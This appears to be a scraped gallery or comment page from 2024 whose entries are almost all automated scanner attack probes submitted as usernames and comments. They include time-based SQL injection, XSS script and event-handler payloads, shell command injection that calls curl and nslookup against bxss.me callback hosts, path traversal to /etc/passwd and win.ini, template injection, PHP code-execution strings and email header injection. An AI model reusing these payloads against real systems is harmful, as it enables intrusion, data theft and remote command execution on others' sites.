XcwJRDFY"&&sleep(27*1000)*iyqiub&&"
12/01/2024

1

image
XcwJRDFY
12/01/2024

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

image
XcwJRDFY
12/01/2024

bxss.me/t/xss.html?%00

image
XcwJRDFY
12/01/2024

'"()&%<zzz><ScRiPt >iXYe(9901)</ScRiPt>

image
XcwJRDFY
12/01/2024

bfg6420<s1﹥s2ʺs3ʹhjl6420

image
XcwJRDFY
12/01/2024

%31%39%37%33%30%22%28%29%3B%7D%5D%39%32%38%37

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
lxbfYeaa
15/05/2024

1

image
lxbfYeaa
15/05/2024

1

image
lxbfYeaa
15/05/2024

1

image
lxbfYeaa
15/05/2024

1

image
ubaTaeCJ
15/05/2024

1

image
ubaTaeCJ
15/05/2024

1

image
wUmrLVWz
01/06/2024

1

image
wUmrLVWz
01/06/2024

1

image
pHqghUme
23/06/2024

1

image
pHqghUme
23/06/2024

1

image
pHqghUme
23/06/2024

1CESCCrEO

image
1vNSixmVO
23/06/2024

1

image
pHqghUme
23/06/2024

response.write(9504959*9426942)

image
'+response.write(9156860*9316594)+'
23/06/2024

1

image
pHqghUme
23/06/2024

/../../../../../../../../../../windows/system32/BITSADMIN.exe

image
pHqghUme
23/06/2024

1

image
pHqghUme
23/06/2024

aYtD3amG

image
pHqghUme
23/06/2024

1

image
pHqghUme
23/06/2024

1

image
pHqghUme
23/06/2024

-1 OR 2+125-125-1=0+0+0+1

image
../../../../../../../../../../../../../../etc/passwd
23/06/2024

1

image
../../../../../../../../../../../../../../windows/win.ini
23/06/2024

1

image
pHqghUme
23/06/2024

-1' OR 2+482-482-1=0+0+0+1 --

image
pHqghUme
23/06/2024

1<esi:include src="http://bxss.me/rpb.png"/>

image
pHqghUme
23/06/2024

${10000458+9999798}

image
pHqghUme
23/06/2024

if(now()=sysdate(),sleep(15),0)

image
pHqghUme
23/06/2024

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

image
${9999330+10000077}
23/06/2024

1

image
pHqghUme
23/06/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
pHqghUme
23/06/2024

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

image
pHqghUme
23/06/2024

&echo fhiink$()\ arnziq\nz^xyu||a #' &echo fhiink$()\ arnziq\nz^xyu||a #|" &echo fhiink$()\ arnziq\nz^xyu||a #

image
pHqghUme
23/06/2024

1

image
pHqghUme
23/06/2024

1&echo hblnag$()\ qdolgc\nz^xyu||a #' &echo hblnag$()\ qdolgc\nz^xyu||a #|" &echo hblnag$()\ qdolgc\nz^xyu||a #

image
pHqghUme
23/06/2024

-1); waitfor delay '0:0:15' --

image
OUhmY25Oc2U=
23/06/2024

1

image
pHqghUme
23/06/2024

-1)); waitfor delay '0:0:15' --

image
pHqghUme
23/06/2024

1&n911633=v970370

image
pHqghUme
23/06/2024

zblOZHU9'); waitfor delay '0:0:15' --

image
pHqghUme
23/06/2024

8zkwRzMB')); waitfor delay '0:0:15' --

image
pHqghUme
23/06/2024

$(nslookup -q=cname hitcfsrudmkjsfc104.bxss.me||curl hitcfsrudmkjsfc104.bxss.me)

image
pHqghUme
23/06/2024

-5) OR 981=(SELECT 981 FROM PG_SLEEP(15))--

image
pHqghUme
23/06/2024

)

image
pHqghUme
23/06/2024

&nslookup -q=cname hitafsxjcozaieb6df.bxss.me&'\"`0&nslookup -q=cname hitafsxjcozaieb6df.bxss.me&`'

image
pHqghUme
23/06/2024

-1)) OR 75=(SELECT 75 FROM PG_SLEEP(15))--

image
pHqghUme
23/06/2024

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

image
pHqghUme
23/06/2024

&(nslookup -q=cname hitntlvhxbxwydb750.bxss.me||curl hitntlvhxbxwydb750.bxss.me)&'\"`0&(nslookup -q=cname hitntlvhxbxwydb750.bxss.me||curl hitntlvhxbxwydb750.bxss.me)&`'

image
pHqghUme
23/06/2024

!(()&&!|*|*|

image
pHqghUme
23/06/2024

HSlYxNrZ' OR 787=(SELECT 787 FROM PG_SLEEP(15))--

image
pHqghUme
23/06/2024

qP6DFjlX')) OR 138=(SELECT 138 FROM PG_SLEEP(15))--

image
pHqghUme
23/06/2024

`(nslookup -q=cname hitkpxodvmqyn6541b.bxss.me||curl hitkpxodvmqyn6541b.bxss.me)`

image
)
23/06/2024

1

image
pHqghUme
23/06/2024

;(nslookup -q=cname hityutwmwrhugf65be.bxss.me||curl hityutwmwrhugf65be.bxss.me)|(nslookup -q=cname hityutwmwrhugf65be.bxss.me||curl hityutwmwrhugf65be.bxss.me)&(nslookup -q=cname hityutwmwrhugf65be.bxss.me||curl hityutwmwrhugf65be.bxss.me)

image
echo aalpnf$()\ dyqhiz\nz^xyu||a #' &echo aalpnf$()\ dyqhiz\nz^xyu||a #|" &echo aalpnf$()\ dyqhiz\nz^xyu||a #
23/06/2024

1

image
|echo oixhfv$()\ roovlm\nz^xyu||a #' |echo oixhfv$()\ roovlm\nz^xyu||a #|" |echo oixhfv$()\ roovlm\nz^xyu||a #
23/06/2024

1

image
pHqghUme
23/06/2024

Http://bxss.me/t/fit.txt

image
pHqghUme|echo gtvrgy$()\ cjvrii\nz^xyu||a #' |echo gtvrgy$()\ cjvrii\nz^xyu||a #|" |echo gtvrgy$()\ cjvrii\nz^xyu||a #
23/06/2024

1

image
'.gethostbyname(lc('hitzn'.'pspjhizub7347.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(74).chr(97).chr(80).'
23/06/2024

1

image
(nslookup -q=cname hitcutelsolsc76461.bxss.me||curl hitcutelsolsc76461.bxss.me))
23/06/2024

1

image
pHqghUme
23/06/2024

@@iX8jN

image
pHqghUme
23/06/2024

bxss.me

image
pHqghUme
23/06/2024

1

image
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
23/06/2024

1

image
|(nslookup -q=cname hitgifsvmtcjgfaa78.bxss.me||curl hitgifsvmtcjgfaa78.bxss.me)
23/06/2024

1

image
`(nslookup -q=cname hithttiafqbnv43d33.bxss.me||curl hithttiafqbnv43d33.bxss.me)`
23/06/2024

1

image
;(nslookup -q=cname hitwjwrzwepwm0fbd7.bxss.me||curl hitwjwrzwepwm0fbd7.bxss.me)|(nslookup -q=cname hitwjwrzwepwm0fbd7.bxss.me||curl hitwjwrzwepwm0fbd7.bxss.me)&(nslookup -q=cname hitwjwrzwepwm0fbd7.bxss.me||curl hitwjwrzwepwm0fbd7.bxss.me)
23/06/2024

1

image
Http://bxss.me/t/fit.txt
23/06/2024

1

image
A9e4zOCt
23/06/2024

1

image
pHqghUme
23/06/2024

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

image
pHqghUme
23/06/2024

1

image
pHqghUme
23/06/2024

";print(md5(31337));$a="

image
pHqghUme
23/06/2024

${@print(md5(31337))}

image
pHqghUme
23/06/2024

1'&&sleep(27*1000)*enoids&&'

image
/etc/shells
23/06/2024

1

image
pHqghUme
23/06/2024

1"||sleep(27*1000)*lejqjn||"

image
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
23/06/2024

1

image
';print(md5(31337));$a='
23/06/2024

1

image
-1 OR 2+337-337-1=0+0+0+1 --
23/06/2024

1

image
";print(md5(31337));$a="
23/06/2024

1

image
${@print(md5(31337))}
23/06/2024

1

image
'"()
23/06/2024

1

image
'.print(md5(31337)).'
23/06/2024

1

image
pHqghUme'&&sleep(27*1000)*ejoayp&&'
23/06/2024

1

image
pHqghUme"&&sleep(27*1000)*uavvte&&"
23/06/2024

1

image
-1 OR 2+17-17-1=0+0+0+1
23/06/2024

1

image
pHqghUme'||sleep(27*1000)*xvvgwm||'
23/06/2024

1

image
-1" OR 2+648-648-1=0+0+0+1 --
23/06/2024

1

image
if(now()=sysdate(),sleep(15),0)
23/06/2024

1

image
pHqghUme
23/06/2024

1

image
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
23/06/2024

1

image
DLG5Hkiy'); waitfor delay '0:0:15' --
24/06/2024

1

image
pHqghUme
24/06/2024

HttP://bxss.me/t/xss.html?%00

image
pHqghUme
24/06/2024

bxss.me/t/xss.html?%00

image
HttP://bxss.me/t/xss.html?%00
24/06/2024

1

image
bxss.me/t/xss.html?%00
24/06/2024

1

image
pHqghUme
24/06/2024

"+"A".concat(70-3).concat(22*4).concat(117).concat(82).concat(113).concat(69)+(require"socket" Socket.gethostbyname("hithv"+"ihjnwpql5f436.bxss.me.")[3].to_s)+"

image
pHqghUme
24/06/2024

'+'A'.concat(70-3).concat(22*4).concat(116).concat(74).concat(111).concat(65)+(require'socket' Socket.gethostbyname('hitgf'+'odwivegu7feaa.bxss.me.')[3].to_s)+'

image
pHqghUme
24/06/2024

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

image
pHqghUme
24/06/2024

comment

image
pHqghUme
24/06/2024

comment

image
"+"A".concat(70-3).concat(22*4).concat(105).concat(65).concat(100).concat(77)+(require"socket" Socket.gethostbyname("hitjd"+"ibwosvkh439da.bxss.me.")[3].to_s)+"
24/06/2024

1

image
pHqghUme
24/06/2024

comment/.

image
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
24/06/2024

1

image
EzHa825U' OR 429=(SELECT 429 FROM PG_SLEEP(15))--
24/06/2024

1

image
pHqghUme
24/06/2024

xfs.bxss.me

image
comment
24/06/2024

1

image
xfs.bxss.me
24/06/2024

1

image
comment/.
24/06/2024

1

image
pHqghUme
24/06/2024

1'"()&%<zzz><ScRiPt >HutI(9700)</ScRiPt>

image
pHqghUme
24/06/2024

'"()&%<zzz><ScRiPt >HutI(9582)</ScRiPt>

image
7TmF5Bj2') OR 71=(SELECT 71 FROM PG_SLEEP(15))--
24/06/2024

1

image
pHqghUme
24/06/2024

<th:t="${dfb}#foreach

image
pHqghUme
24/06/2024

dfb[[${98991*97996}]]xca

image
pHqghUme
24/06/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
24/06/2024

1

image
pHqghUme
24/06/2024

1</script><script>HutI(9713)</script>

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme'"()&%<zzz><ScRiPt >HutI(9534)</ScRiPt>
24/06/2024

1

image
pHqghUme9562112
24/06/2024

1

image
<th:t="${dfb}#foreach
24/06/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
24/06/2024

1

image
%70%48%71%67%68%55%6D%65%39%34%31%35%22%28%29%3B%7D%5D%39%39%37%30
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
GRLpGpAG
24/06/2024

1De3aFEq2tO

image
/../../../../../../../../../../windows/system32/BITSADMIN.exe
24/06/2024

1

image
GRLpGpAG
24/06/2024

to@example.com> bcc:074625.16571-31976.16571.1d17f.19898.2@bxss.me

image
GRLpGpAG
24/06/2024

dfb{{98991*97996}}xca

image
GRLpGpAG
24/06/2024

$(nslookup -q=cname hitttpvknzwghb5126.bxss.me||curl hitttpvknzwghb5126.bxss.me)

image
GRLpGpAG
24/06/2024

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

image
GRLpGpAG
24/06/2024

dfb{#98991*97996}xca

image
GRLpGpAG
24/06/2024

${@print(md5(31337))}

image
bxss.me
24/06/2024

1

image
GRLpGpAG
24/06/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
GRLpGpAG
24/06/2024

1</script><script>hNAA(9685)</script>

image
-1 OR 2+748-748-1=0+0+0+1 --
24/06/2024

1

image
-1' OR 2+682-682-1=0+0+0+1 --
24/06/2024

1

image
-1' OR 2+468-468-1=0+0+0+1 or 'sdLrD8wZ'='
24/06/2024

1

image
-1" OR 2+695-695-1=0+0+0+1 --
24/06/2024

1

image
GRLpGpAG
24/06/2024

1<img src=//xss.bxss.me/t/dot.gif onload=ZPBO(9244)>

image
U00EaKq6'); waitfor delay '0:0:15' --
24/06/2024

1

image
pHqghUme9342803
24/06/2024

1

image
bfg1500<s1﹥s2ʺs3ʹhjl1500
24/06/2024

1

image
to@example.com> bcc:074625.16572-28916.16572.3006e.19898.2@bxss.me
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

../../../../../../../../../../../../../../windows/win.ini

image
../../../../../../../../../../../../../../windows/win.ini
24/06/2024

1

image
if(now()=sysdate(),sleep(15),0)
24/06/2024

1

image
comment/.
24/06/2024

1

image
pHqghUme'&&sleep(27*1000)*nsjtcx&&'
24/06/2024

1

image
tgJYMbfk')) OR 472=(SELECT 472 FROM PG_SLEEP(15))--
24/06/2024

1

image
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
24/06/2024

1

image
pHqghUme<ScRiPt >FH4B(9208)</ScRiPt>
24/06/2024

1

image
pHqghUme<isindex type=image src=1 onerror=FH4B(9337)>
24/06/2024

1

image
pHqghUme
24/06/2024

19351"();}]9132

image
pHqghUme
24/06/2024

|echo wsjxdt$()\ ozbknu\nz^xyu||a #' |echo wsjxdt$()\ ozbknu\nz^xyu||a #|" |echo wsjxdt$()\ ozbknu\nz^xyu||a #

image
pHqghUme</script><script>XWSj(9972)</script>
24/06/2024

1

image
pHqghUme
24/06/2024

1 waitfor delay '0:0:15' --

image
pHqghUme
24/06/2024

-5 OR 90=(SELECT 90 FROM PG_SLEEP(15))--

image
pHqghUme
24/06/2024

comment/.

image
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
24/06/2024

1

image
pHqghUme"&&sleep(27*1000)*xczjhh&&"
24/06/2024

1

image
pHqghUme
24/06/2024

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

image
';print(md5(31337));$a='
24/06/2024

1

image
pHqghUme
24/06/2024

1C4BlqfL3aO

image
pHqghUme
24/06/2024

&echo giincx$()\ urctyh\nz^xyu||a #' &echo giincx$()\ urctyh\nz^xyu||a #|" &echo giincx$()\ urctyh\nz^xyu||a #

image
pHqghUme
24/06/2024

../1

image
../../../../../../../../../../../../../../windows/win.ini
24/06/2024

1

image
pHqghUme
24/06/2024

Http://bxss.me/t/fit.txt

image
pHqghUme
24/06/2024

";print(md5(31337));$a="

image
pHqghUme
24/06/2024

'"()&%<zzz><ScRiPt >9jrG(9065)</ScRiPt>

image
pHqghUme
24/06/2024

19853253

image
pHqghUme
24/06/2024

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

image
bfg3566<s1﹥s2ʺs3ʹhjl3566
24/06/2024

1

image
<th:t="${dfb}#foreach
24/06/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
24/06/2024

1

image
'"()&%<zzz><ScRiPt >9LXS(9428)</ScRiPt>
24/06/2024

1

image
-1 OR 2+377-377-1=0+0+0+1 --
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1<ScRiPt >F2fv(9030)</ScRiPt>

image
pHqghUme
24/06/2024

1<ScR<ScRiPt>IpT>F2fv(9735)</sCr<ScRiPt>IpT>

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
'+response.write(9642257*9731575)+'
24/06/2024

1

image
pHqghUme
24/06/2024

1 bcc:074625.16574-30065.16574.b5b89.19898.2@bxss.me

image
pHqghUme
24/06/2024

file:///etc/passwd

image
pHqghUme
24/06/2024

^(#$!@#$)(()))******

image
../../../../../../../../../../../../../../windows/win.ini
24/06/2024

1

image
pHqghUme
24/06/2024

GlEkgHMN

image
pHqghUme
24/06/2024

";print(md5(31337));$a="

image
/etc/passwd
24/06/2024

1

image
pHqghUme"&&sleep(27*1000)*regytv&&"
24/06/2024

1

image
'.print(md5(31337)).'
24/06/2024

1

image
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
24/06/2024

1

image
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
24/06/2024

1

image
GRLpGpAG
24/06/2024

1

image
GRLpGpAG
24/06/2024

1

image
../GRLpGpAG
24/06/2024

1

image
$(nslookup -q=cname hitugmvqurdot1f412.bxss.me||curl hitugmvqurdot1f412.bxss.me)
24/06/2024

1

image
;(nslookup -q=cname hituvdsjqgdphc086c.bxss.me||curl hituvdsjqgdphc086c.bxss.me)|(nslookup -q=cname hituvdsjqgdphc086c.bxss.me||curl hituvdsjqgdphc086c.bxss.me)&(nslookup -q=cname hituvdsjqgdphc086c.bxss.me||curl hituvdsjqgdphc086c.bxss.me)
24/06/2024

1

image
c:/windows/win.ini
24/06/2024

1

image
".gethostbyname(lc("hitur"."knwpzaol2892e.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(71).chr(99).chr(88)."
24/06/2024

1

image
GRLpGpAG
24/06/2024

-1" OR 2+276-276-1=0+0+0+1 --

image
"+"A".concat(70-3).concat(22*4).concat(101).concat(75).concat(110).concat(73)+(require"socket" Socket.gethostbyname("hitpu"+"crourkagb4ac1.bxss.me.")[3].to_s)+"
24/06/2024

1

image
GRLpGpAG
24/06/2024

comment/.

image
GRLpGpAG
24/06/2024

1'||sleep(27*1000)*hpydvu||'

image
'"()
24/06/2024

1

image
xfs.bxss.me
24/06/2024

1

image
'.print(md5(31337)).'
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

response.write(9697610*9654995)

image
pHqghUme
24/06/2024

1

image
http://bxss.me/t/fit.txt?.jpg
24/06/2024

1

image
)
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

image
'.print(md5(31337)).'
24/06/2024

1

image
pHqghUme
24/06/2024

dfb{@math key=98991 method="multiply" operand=97996/}xca

image
pHqghUme
24/06/2024

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

image
pHqghUme
24/06/2024

-1' OR 3*2>(0+5+419-419) or 'fJ0i6UBw'='

image
pHqghUme
24/06/2024

-1" OR 2+505-505-1=0+0+0+1 --

image
pHqghUme9017903
24/06/2024

1

image
pHqghUme
24/06/2024

1<ScRiPt >WniM(9103)</ScRiPt>

image
pHqghUme
24/06/2024

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9261'>

image
1 waitfor delay '0:0:15' --
24/06/2024

1

image
obbxAfVk' OR 905=(SELECT 905 FROM PG_SLEEP(15))--
24/06/2024

1

image
pHqghUme
24/06/2024

1<WRDQ2P>FXDT5[!+!]</WRDQ2P>

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
dfb${98991*97996}xca
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
../../../../../../../../../../../../../../windows/win.ini
24/06/2024

1

image
pHqghUme
24/06/2024

Http://bxss.me/t/fit.txt

image
dfb{{98991*97996}}xca
24/06/2024

1

image
(nslookup -q=cname hituyczjmgpbo4df30.bxss.me||curl hituyczjmgpbo4df30.bxss.me))
24/06/2024

1

image
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
24/06/2024

1

image
pHqghUme
24/06/2024

^(#$!@#$)(()))******

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

-1' OR 2+365-365-1=0+0+0+1 or '8FrnZRQa'='

image
'"()
24/06/2024

1

image
pHqghUme
24/06/2024

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

image
pHqghUme
24/06/2024

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

image
pHqghUme<script>58tF(9741)</script>
24/06/2024

1

image
pHqghUme
24/06/2024

'"()&%<zzz><ScRiPt >WWRY(9516)</ScRiPt>

image
pHqghUme
24/06/2024

1

image
pHqghUme<body onload=58tF(9038)>
24/06/2024

1

image
<%={{={@{#{${dfb}}%>
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

19055173

image
pHqghUme9494426
24/06/2024

1

image
pHqghUme
24/06/2024

1'"()&%<zzz><ScRiPt >0Qiy(9288)</ScRiPt>

image
pHqghUme
24/06/2024

'"()&%<zzz><ScRiPt >0Qiy(9352)</ScRiPt>

image
pHqghUme
24/06/2024

19524847

image
pHqghUme
24/06/2024

1

image
dfb${98991*97996}xca
24/06/2024

1

image
dfb#{98991*97996}xca
24/06/2024

1

image
dfb{#98991*97996}xca
24/06/2024

1

image
dfb@(98991*97996)xca
24/06/2024

1

image
98991*97996*98991*97996
24/06/2024

1

image
#{98991*97996*98991*97996}
24/06/2024

1

image
/../../../../../../../../../../windows/system32/BITSADMIN.exe
24/06/2024

1

image
dfb#{xca}=123
24/06/2024

1

image
1BNgSQcL3QO
24/06/2024

1

image
pHqghUme
24/06/2024

ffXNMJtn

image
GS6wi5P5
24/06/2024

1

image
response.write(9638206*9122748)
24/06/2024

1

image
'+response.write(9638206*9122748)+'
24/06/2024

1

image
pHqghUme
24/06/2024

1&echo yptqdo$()\ kfqwmo\nz^xyu||a #' &echo yptqdo$()\ kfqwmo\nz^xyu||a #|" &echo yptqdo$()\ kfqwmo\nz^xyu||a #

image
dfb[[${98991*97996}]]xca
24/06/2024

1

image
pHqghUme
24/06/2024

|echo zudriz$()\ rmomvu\nz^xyu||a #' |echo zudriz$()\ rmomvu\nz^xyu||a #|" |echo zudriz$()\ rmomvu\nz^xyu||a #

image
pHqghUme
24/06/2024

1|echo aeckdm$()\ ofltyl\nz^xyu||a #' |echo aeckdm$()\ ofltyl\nz^xyu||a #|" |echo aeckdm$()\ ofltyl\nz^xyu||a #

image
dfb__${98991*97996}__::.x
24/06/2024

1

image
pHqghUme
24/06/2024

&nslookup -q=cname hitgmylpwzdoq4f246.bxss.me&'\"`0&nslookup -q=cname hitgmylpwzdoq4f246.bxss.me&`'

image
pHqghUme
24/06/2024

file:///etc/passwd

image
pHqghUme<esi:include src="http://bxss.me/rpb.png"/>
24/06/2024

1

image
pHqghUme
24/06/2024

|(nslookup -q=cname hitjulxdtqmfz241a7.bxss.me||curl hitjulxdtqmfz241a7.bxss.me)

image
pHqghUme
24/06/2024

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

image
pHqghUme
24/06/2024

`(nslookup -q=cname hitzsuxoocqke21896.bxss.me||curl hitzsuxoocqke21896.bxss.me)`

image
../../../../../../../../../../../../../../etc/passwd
24/06/2024

1

image
pHqghUme
24/06/2024

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

image
pHqghUme
24/06/2024

http://bxss.me/t/fit.txt?.jpg

image
pHqghUme
24/06/2024

;(nslookup -q=cname hitwehuznharv3e8d2.bxss.me||curl hitwehuznharv3e8d2.bxss.me)|(nslookup -q=cname hitwehuznharv3e8d2.bxss.me||curl hitwehuznharv3e8d2.bxss.me)&(nslookup -q=cname hitwehuznharv3e8d2.bxss.me||curl hitwehuznharv3e8d2.bxss.me)

image
dFlkMFZ1aDM=
24/06/2024

1

image
echo imdtnn$()\ ivankf\nz^xyu||a #' &echo imdtnn$()\ ivankf\nz^xyu||a #|" &echo imdtnn$()\ ivankf\nz^xyu||a #
24/06/2024

1

image
pHqghUme
24/06/2024

c:/windows/win.ini

image
&echo anylgu$()\ xwuwwr\nz^xyu||a #' &echo anylgu$()\ xwuwwr\nz^xyu||a #|" &echo anylgu$()\ xwuwwr\nz^xyu||a #
24/06/2024

1

image
./pHqghUme
24/06/2024

1

image
(nslookup -q=cname hitojvhbinpdkaa223.bxss.me||curl hitojvhbinpdkaa223.bxss.me))
24/06/2024

1

image
Http://bxss.me/t/fit.txt
24/06/2024

1

image
$(nslookup -q=cname hitffeihcracn6f5c4.bxss.me||curl hitffeihcracn6f5c4.bxss.me)
24/06/2024

1

image
pHqghUme
24/06/2024

!(()&&!|*|*|

image
pHqghUme
24/06/2024

1

image
&(nslookup -q=cname hitriynymebmw0abfb.bxss.me||curl hitriynymebmw0abfb.bxss.me)&'\"`0&(nslookup -q=cname hitriynymebmw0abfb.bxss.me||curl hitriynymebmw0abfb.bxss.me)&`'
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
)
24/06/2024

1

image
pHqghUme<script>603B(9842)</script>
24/06/2024

1

image
`(nslookup -q=cname hitvqhbclgpoq9890c.bxss.me||curl hitvqhbclgpoq9890c.bxss.me)`
24/06/2024

1

image
pHqghUme<script>603B(9139)</script>9139
24/06/2024

1

image
pHqghUme
24/06/2024

"+"A".concat(70-3).concat(22*4).concat(117).concat(89).concat(113).concat(83)+(require"socket" Socket.gethostbyname("hithf"+"fjvzreyfd5e35.bxss.me.")[3].to_s)+"

image
pHqghUme
24/06/2024

'+'A'.concat(70-3).concat(22*4).concat(109).concat(70).concat(113).concat(83)+(require'socket' Socket.gethostbyname('hitqn'+'qbtcvvrrf6819.bxss.me.')[3].to_s)+'

image
pHqghUme
24/06/2024

HttP://bxss.me/t/xss.html?%00

image
pHqghUme
24/06/2024

bxss.me/t/xss.html?%00

image
'+'A'.concat(70-3).concat(22*4).concat(108).concat(76).concat(106).concat(85)+(require'socket' Socket.gethostbyname('hitar'+'rydfeqty125d4.bxss.me.')[3].to_s)+'
24/06/2024

1

image
/etc/shells
24/06/2024

1

image
bxss.me/t/xss.html?%00
24/06/2024

1

image
pHqghUme
24/06/2024

1'&&sleep(27*1000)*ygkhpb&&'

image
c:/windows/win.ini
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

";print(md5(31337));$a="

image
pHqghUme
24/06/2024

1"&&sleep(27*1000)*kgldac&&"

image
pHqghUme
24/06/2024

${@print(md5(31337))}

image
pHqghUme
24/06/2024

${@print(md5(31337))}\

image
bxss.me
24/06/2024

1

image
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
24/06/2024

1

image
pHqghUme
24/06/2024

1"||sleep(27*1000)*zxnqoh||"

image
pHqghUme
24/06/2024

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

image
';print(md5(31337));$a='
24/06/2024

1

image
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
24/06/2024

1

image
";print(md5(31337));$a="
24/06/2024

1

image
pHqghUme
24/06/2024

comment

image
pHqghUme
24/06/2024

1

image
${@print(md5(31337))}\
24/06/2024

1

image
pHqghUme
24/06/2024

comment/.

image
pHqghUme
24/06/2024

'"

image
xfs.bxss.me
24/06/2024

1

image
pHqghUme<isindex type=image src=1 onerror=603B(9161)>
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

<!--

image
'.print(md5(31337)).'
24/06/2024

1

image
'"
24/06/2024

1

image
pHqghUme
24/06/2024

-1' OR 2+920-920-1=0+0+0+1 --

image
comment/.
24/06/2024

1

image
pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9846'>
24/06/2024

1

image
pHqghUme
24/06/2024

-1' OR 2+458-458-1=0+0+0+1 or 'Bj4Xmmr6'='

image
pHqghUme"||sleep(27*1000)*hesygg||"
24/06/2024

1

image
pHqghUme
24/06/2024

1'"

image
pHqghUme
24/06/2024

@@l5uk9

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

bfg5764<s1﹥s2ʺs3ʹhjl5764

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
6G5GzWn6
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
-1 OR 2+923-923-1=0+0+0+1 --
24/06/2024

1

image
pHqghUme
24/06/2024

<th:t="${dfb}#foreach

image
-1" OR 2+548-548-1=0+0+0+1 --
24/06/2024

1

image
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
24/06/2024

1

image
1 waitfor delay '0:0:15' --
24/06/2024

1

image
pHqghUme
24/06/2024

dfb__${98991*97996}__::.x

image
pHqghUme
24/06/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
kwWZ77qh')); waitfor delay '0:0:15' --
24/06/2024

1

image
ltx3UxW9' OR 618=(SELECT 618 FROM PG_SLEEP(15))--
24/06/2024

1

image
1'"
24/06/2024

1

image
pHqghUme<img/src=">" onerror=alert(9944)>
24/06/2024

1

image
%70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%36%30%33%42%289685%29%3C%2F%73%43%72%69%70%54%3E
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme&lt;ScRiPt&gt;603B(9925)&lt;/sCripT&gt;
24/06/2024

1

image
pHqghUme
24/06/2024

%31%39%37%37%31%22%28%29%3B%7D%5D%39%30%34%31

image
<a HrEF=http://xss.bxss.me></a>
24/06/2024

1

image
<a HrEF=jaVaScRiPT:>
24/06/2024

1

image
